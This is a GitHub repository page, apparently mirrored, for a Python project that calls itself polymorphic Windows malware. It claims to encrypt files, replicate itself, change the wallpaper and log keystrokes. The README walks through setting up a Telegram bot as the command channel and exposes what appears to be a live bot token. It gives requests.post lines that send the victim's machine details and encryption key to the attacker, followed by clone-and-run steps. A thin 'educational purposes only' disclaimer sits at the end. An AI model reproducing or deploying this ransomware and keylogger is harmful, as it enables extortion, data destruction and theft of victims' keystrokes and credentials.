Thanks to visit codestin.com
Credit goes to github.com

Skip to content

networkkiller/MalwarePolymorphic

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

Python Malware Polymorfhic

Simple Windows-based malware capable of encrypting files, replicating itself, changing wallpaper, logging all keystrokes by victims

YouTube Video

Getting Started

Requirements

You can install the Requirements by running the command:

install the libraries written in the code

Operating Instructions

1) Send Telegram (api) Message

Telegram api (https://core.telegram.org/bots/api)

1)open telegram
2)search BotFather
3)/newbot
4)Choose a username for your bot (malwareusername_bot)

Use this token to access the HTTP API:
3416572059:AAGB7p9WAe0jWamE89ftR02MR2WgbxlLZEg

Chat Id

1)search Json Dump Bot
2)/start
3)telegramapi

"from": {
    "id": 3213112048, your chat_id

Send Message Example:

    requests.post("https://api.telegram.org/bot<your_telegram_api>g/sendMessage",
            data={"chat_id": "<your_telegram_chat_id>", "text": f"Node: {node} Release: {release} \nKey: {str(key)}"})

    requests.post("https://api.telegram.org/bot<your_telegram_api>/sendMessage",
            data={"chat_id": "<your_telegram_chat_id>", "text": f"Node: {node} Release: {release} \nKey: {str(key)}"})

Installation

$ git clone https://github.com/networkkiller/MalwarePolymorphic
$ python3 malwarepolymorfic.py

Attention ⚠️

These scripts contain stuff that can get you in trouble. This is for educational purposes only. Do not abuse.

view Me Youtube ☕

"follow me for more"

About

malware polimórfico con distintas funciones

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages